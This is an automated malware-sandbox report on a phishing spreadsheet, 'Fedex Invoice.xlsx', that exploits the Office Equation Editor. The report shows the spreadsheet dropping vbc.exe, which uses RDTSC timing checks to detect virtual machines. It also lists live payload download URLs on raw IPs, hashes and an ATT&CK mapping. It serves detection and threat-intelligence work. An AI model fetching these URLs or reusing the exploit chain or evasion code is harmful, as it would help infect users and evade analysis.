    Malware Analysis System Evasion:

    barindex
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000459872 second address: 0000000000459872 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 1ECE1B4Fh 0x00000007 xor eax, 1DCBF7C6h 0x0000000c xor eax, 314CA14Ah 0x00000011 sub eax, 32494DC2h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FD8B8FCB1F8h 0x0000001e lfence 0x00000021 mov edx, 823F9AFEh 0x00000026 add edx, 01EEC23Dh 0x0000002c xor edx, 2B36126Dh 0x00000032 xor edx, D0E64F42h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d jmp 00007FD8B8FCB236h 0x0000003f cmp bh, ch 0x00000041 ret 0x00000042 sub edx, esi 0x00000044 ret 0x00000045 test ax, bx 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 test eax, edx 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007FD8B8FCB1D7h 0x0000005b call 00007FD8B8FCB28Bh 0x00000060 call 00007FD8B8FCB219h 0x00000065 lfence 0x00000068 mov edx, 823F9AFEh 0x0000006d add edx, 01EEC23Dh 0x00000073 xor edx, 2B36126Dh 0x00000079 xor edx, D0E64F42h 0x0000007f mov edx, dword ptr [edx] 0x00000081 lfence 0x00000084 jmp 00007FD8B8FCB236h 0x00000086 cmp bh, ch 0x00000088 ret 0x00000089 mov esi, edx 0x0000008b pushad 0x0000008c rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2560Thread sleep time: -300000s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2560Thread sleep time: -60000s >= -30000s
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045986A rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045986A rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00458C21 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004544FC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454515 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00453D1D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004566CF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045939A mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmpBinary or memory string: Program Manager<

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Fedex Invoice.xlsx31%VirustotalBrowse
    Fedex Invoice.xlsx28%ReversingLabsDocument-Word.Exploit.CVE-2017-11882

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\Public\vbc.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe24%VirustotalBrowse

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://37.0.11.217/KELLYREMCOS_UOuJB118.bin1%VirustotalBrowse
    http://37.0.11.217/KELLYREMCOS_UOuJB118.bin0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://212.192.246.25/rever/vbc.exe8%VirustotalBrowse
    http://212.192.246.25/rever/vbc.exe0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://37.0.11.217/KELLYREMCOS_UOuJB118.bintrue
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://212.192.246.25/rever/vbc.exetrue
    • 8%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpfalse
      high
      http://www.icra.org/vocabulary/.vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://www.day.com/dam/1.05DD04ABC.emf.0.drfalse
        high

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        212.192.246.25
        unknownRussian Federation
        205220RHC-HOSTINGGBtrue

        General Information

        Joe Sandbox Version:33.0.0 White Diamond
        Analysis ID:483375
        Start date:14.09.2021
        Start time:21:50:17
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 6m 9s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:Fedex Invoice.xlsx
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:2
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.expl.evad.winXLSX@4/21@0/1
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 4% (good quality ratio 2.3%)
        • Quality average: 36.2%
        • Quality standard deviation: 32.8%
        HCA Information:Failed
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .xlsx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe
        • TCP Packets have been reduced to 100
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        21:50:47API Interceptor29x Sleep call for process: EQNEDT32.EXE modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        212.192.246.25ORDER.xlsxGet hashmaliciousBrowse
        • 212.192.246.25/reverse/vbc.exe
        Inquiry Sheet.xlsxGet hashmaliciousBrowse
        • 212.192.246.25/excel/vbc.exe

        Domains

        No context

        ASN

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        RHC-HOSTINGGBORDER.xlsxGet hashmaliciousBrowse
        • 212.192.246.25
        Inquiry Sheet.xlsxGet hashmaliciousBrowse
        • 212.192.246.25
        01_extracted.exeGet hashmaliciousBrowse
        • 212.192.246.191
        CHECKLIST INQ 1119.vbsGet hashmaliciousBrowse
        • 212.192.246.191
        DOCU_SIGN8289292930001028839.PDF.exeGet hashmaliciousBrowse
        • 212.192.246.165
        DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
        • 212.192.246.165
        DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
        • 212.192.246.165
        DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
        • 212.192.246.165
        DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
        • 212.192.246.165
        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
        • 212.192.246.176
        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
        • 212.192.246.176
        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
        • 212.192.246.176
        53t6VeSUO5.exeGet hashmaliciousBrowse
        • 212.192.246.56
        1p34FDbhjW.exeGet hashmaliciousBrowse
        • 212.192.246.176
        eli.exeGet hashmaliciousBrowse
        • 212.192.246.242
        eli.exeGet hashmaliciousBrowse
        • 212.192.246.242
        rfq-aug-09451.exeGet hashmaliciousBrowse
        • 212.192.246.250
        Nd1eFNdNeE.exeGet hashmaliciousBrowse
        • 212.192.246.73
        J5U0QK6IhH.exeGet hashmaliciousBrowse
        • 212.192.246.147
        RF 2001466081776.docGet hashmaliciousBrowse
        • 212.192.246.147

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:downloaded
        Size (bytes):135168
        Entropy (8bit):6.633797451082329
        Encrypted:false
        SSDEEP:1536:A8N0//nCe6zBm5+JqYnViL7yQMLIn6Otq/CrAvI70qBGqdFafRo6DomgJ:TaCeWBJdVc/MLo6Ot57HdFaf5oj
        MD5:ED004FE1AA9F4FA169A05B6716C03484
        SHA1:59AF725F7F1D9582674A0236F4E41B76BBA99D83
        SHA-256:ACE5D939D3258882A6D2E2431A690EE9ED410432BFA537465A2DD9DA92441F74
        SHA-512:B52579B5A47391863BD9CD5052375C3FEFE2A104D058929A3911D552E1BF0D4EC0C30C73469713F1B0852771FCB3C206F486C06AAC4C15E561C552FD333C193E
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        • Antivirus: Virustotal, Detection: 24%, Browse
        Reputation:low
        IE Cache URL:http://212.192.246.25/rever/vbc.exe
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L.....VV............................p.............@..........................P..............................................$...(.......";..................................................................8... .......$............................text............................... ..`.data...dE..........................@....rsrc...";.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39BFBB29.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):49744
        Entropy (8bit):7.99056926749243
        Encrypted:true
        SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
        MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
        SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
        SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
        SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD04ABC.emf
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):648132
        Entropy (8bit):2.812211369731048
        Encrypted:false
        SSDEEP:3072:n34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:34UcLe0JOcXuunhqcS
        MD5:7BF1D75FF62365C6DAF8F6994B0808F9
        SHA1:C0154C020C48AC0B368D2EDC3FB1A3E78524015F
        SHA-256:F63F7244E9227031D9E5508D6EEF6D79FF1A563D3435B5C1854E27B74BD0A89F
        SHA-512:0BA39F8EB4CCA7131878F7477AAF6F99E77880109A7CFBB17D60809680B4BB2EFB0280DCB5F955AB6265E42958E2E74C53A653FD5E38992FACC3F34ADFC942B5
        Malicious:false
        Reputation:low
        Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$...p.5..f.Y.@8.%...L.5...5.......5.t.5.RQ$[..5...5.....\.5...5.$Q$[..5...5. ...Id.Y..5...5. ............d.Y............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i.............5.X.....5. .5..8.Y........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6576CE85.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):84203
        Entropy (8bit):7.979766688932294
        Encrypted:false
        SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
        MD5:208FD40D2F72D9AED77A86A44782E9E2
        SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
        SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
        SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6964C2A.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
        Category:dropped
        Size (bytes):85020
        Entropy (8bit):7.2472785111025875
        Encrypted:false
        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
        MD5:738BDB90A9D8929A5FB2D06775F3336F
        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96EA4B94.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
        Category:dropped
        Size (bytes):7006
        Entropy (8bit):7.000232770071406
        Encrypted:false
        SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
        MD5:971312D4A6C9BE9B496160215FE59C19
        SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
        SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
        SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
        Malicious:false
        Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98762820.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
        Category:dropped
        Size (bytes):14198
        Entropy (8bit):7.916688725116637
        Encrypted:false
        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
        SHA1:72CA86D260330FC32246D28349C07933E427065D
        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
        Malicious:false
        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A4FD716.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):6815
        Entropy (8bit):7.871668067811304
        Encrypted:false
        SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
        MD5:E2267BEF7933F02C009EAEFC464EB83D
        SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
        SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
        SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
        Malicious:false
        Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6E6B01F.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):33795
        Entropy (8bit):7.909466841535462
        Encrypted:false
        SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
        MD5:613C306C3CC7C3367595D71BEECD5DE4
        SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
        SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
        SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
        Malicious:false
        Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8149A23.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
        Category:dropped
        Size (bytes):8815
        Entropy (8bit):7.944898651451431
        Encrypted:false
        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
        MD5:F06432656347B7042C803FE58F4043E1
        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
